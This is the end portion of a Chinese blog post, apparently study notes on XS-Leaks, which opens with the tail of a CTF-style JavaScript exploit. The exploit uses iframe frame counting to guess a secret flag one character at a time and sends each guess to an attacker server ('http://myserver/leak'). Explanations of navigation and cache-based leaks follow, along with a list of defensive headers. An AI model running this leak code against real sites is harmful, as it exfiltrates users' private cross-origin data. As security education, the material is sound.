class="line">    <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(x);</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">&quot;leak = &quot;</span> + leak + curChar);</span><br><span class="line">    </span><br><span class="line">    <span class="comment">//When the page inside the iframe is loaded</span></span><br><span class="line">    x.<span class="property">onload</span> = <span class="function">() =&gt;</span> &#123;</span><br><span class="line">    <span class="comment">//检查页面中有多少个 iframe，如果有1个或多个，则说明当前枚举的字符是有效的。</span></span><br><span class="line">        <span class="keyword">if</span> (x.<span class="property">contentWindow</span>.<span class="property">frames</span>.<span class="property">length</span> != <span class="number">0</span>) &#123;</span><br><span class="line">            <span class="title function_">fetch</span>(<span class="string">&#x27;http://myserver/leak?&#x27;</span> + <span class="built_in">escape</span>(leak), &#123;</span><br><span class="line">                <span class="attr">method</span>: <span class="string">&quot;POST&quot;</span>,</span><br><span class="line">                <span class="attr">mode</span>: <span class="string">&quot;no-cors&quot;</span>,</span><br><span class="line">                <span class="attr">credentials</span>: <span class="string">&quot;include&quot;</span></span><br><span class="line">            &#125;);</span><br><span class="line">            leak += curChar</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="title function_">search</span>(leak, (charCounter + <span class="number">1</span>) % chars.<span class="property">length</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="keyword">function</span> <span class="title function_">exploit</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">search</span>(<span class="string">&quot;fb&#123;&quot;</span>, <span class="number">0</span>);</span><br><span class="line">&#125;</span><br><span class="line"> </span><br><span class="line"><span class="title function_">exploit</span>();</span><br></pre></td></tr></table></figure>



<h2 id="通过检测导航泄露"><a href="#通过检测导航泄露" class="headerlink" title="通过检测导航泄露"></a>通过检测导航泄露</h2><p><a target="_blank" rel="noopener" href="https://xsleaks.dev/docs/attacks/navigations/">https://xsleaks.dev/docs/attacks/navigations/</a></p>
<p>检测跨站页面是否触发导航对攻击者来说很有用。例如，网站可能会根据用户的状态在某个端点触发导航。</p>
<p>为了检测是否发生了任何类型的导航，攻击者可以：</p>
<ul>
<li>使用并计算事件被触发的<code>iframe</code>次数。<code>onload</code></li>
<li>检查 的值<code>history.length</code>，该值可通过任何窗口引用访问。这提供了受害者历史记录中由<code>history.pushState</code>或常规导航更改的条目数。为了获取 的值<code>history.length</code>，攻击者将窗口引用的位置更改为目标网站，然后改回同源，最后读取该值。</li>
</ul>
<h2 id="通过浏览器缓存泄露"><a href="#通过浏览器缓存泄露" class="headerlink" title="通过浏览器缓存泄露"></a>通过浏览器缓存泄露</h2><p>当用户访问网站时，这些网站的资源通常会被缓存并存储在用户的磁盘上，因此不必再次下载。这节省了带宽，降低了服务器负载，并改善了用户体验。</p>
<p>不幸的是，基于时间和错误的 xsleak 变体可以利用这一点并确定用户之前是否访问过网站。</p>
<p>缓存时间变化很简单，为请求计时，如果是瞬时的，则资源被缓存。</p>
<p>基于错误的版本稍微复杂一些。它利用了缓存资源从未从服务器实际请求过的事实。因此，对缓存资源的无效 HTTP 请求不会引发异常（因为 Web 服务器永远没有机会拒绝它）。</p>
<h2 id="通过帧中的-ID-字段泄漏"><a href="#通过帧中的-ID-字段泄漏" class="headerlink" title="通过帧中的 ID 字段泄漏"></a>通过帧中的 ID 字段泄漏</h2><p><a target="_blank" rel="noopener" href="https://xsleaks.dev/docs/attacks/id-attribute/">https://xsleaks.dev/docs/attacks/id-attribute/</a></p>
<h1 id="防止XS-Leaks"><a href="#防止XS-Leaks" class="headerlink" title="防止XS-Leaks"></a>防止XS-Leaks</h1><p>完全防止是不可能滴</p>
<ol>
<li>使用 SameSite 属性保护您的 cookie。</li>
<li>使用 Content-Security-Policy 和 X-Frame-Options 来防止框架。</li>
<li>考虑使用 Cache-Control 禁用缓存。</li>
<li>使用 fetch metadata headers 和 Vary header 来防止缓存探测。</li>
<li>实施跨域开放政策。</li>
<li>实施跨域资源策略。</li>
<li>实施隔离政策。</li>
</ol>
<p>参考文章：<a target="_blank" rel="noopener" href="https://blog.csdn.net/allway2/article/details/126703565">https://blog.csdn.net/allway2/article/details/126703565</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/starrys/p/15171221.html">https://www.cnblogs.com/starrys/p/15171221.html</a></p>

        </div>

        
            <section class="post-copyright">
                
                    <p class="copyright-item">
                        <span>Author:</span>
                        <span>Meteor_Kai</span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>Permalink:</span>
                        <span><a href="http://meteorkai.github.io/2025/04/07/XS-Leaks%E5%AD%A6%E4%B9%A0/">http://meteorkai.github.io/2025/04/07/XS-Leaks%E5%AD%A6%E4%B9%A0/</a></span>
                    </p>
                
                
                    <p class="copyright-item">
                        <span>License:</span>
                        <span>Copyright (c) 2019 <a target="_blank" rel="noopener" href="http://creativecommons.org/licenses/by-nc/4.0/">CC-BY-NC-4.0</a> LICENSE</span>
                    </p>
                
                
                     <p class="copyright-item">
                         <span>Slogan:</span>
                         <span>CyberSecurity brings me great joy!</span>
                     </p>
                

            </section>
        
        <section class="post-tags">
            <div>
                <span>Tag(s):</span>
                <span class="tag">
                    
                    
                        <a href="/tags/%E4%BE%A7%E4%BF%A1%E9%81%93/"># 侧信道</a>
                    
                        
                </span>
            </div>
            <div>
                <a href="javascript:window.history.back();">back</a>
                <span>· </span>
                <a href="/">home</a>
            </div>
        </section>
        <section class="post-nav">
            
                <a class="prev" rel="prev" href="/2025/04/07/NCTF2024-web-wp/">NCTF2024 web wp</a>
            
            
            <a class="next" rel="next" href="/2025/04/04/Vite%E5%BC%80%E5%8F%91%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E5%A4%8D%E7%8E%B0-CVE-2025-31125/">Vite开发服务器任意文件读取漏洞分析复现(CVE-2025-31125)</a>
            
        </section>


    </article>
</div>

            </div>
            <footer id="footer" class="footer">
    <div class="copyright">
        <span>© Meteor_Kai | Powered by <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/Siricee/hexo-theme-Chic" target="_blank">Chic</a></span>
    </div>
</footer>

    </div>
</body>

</html>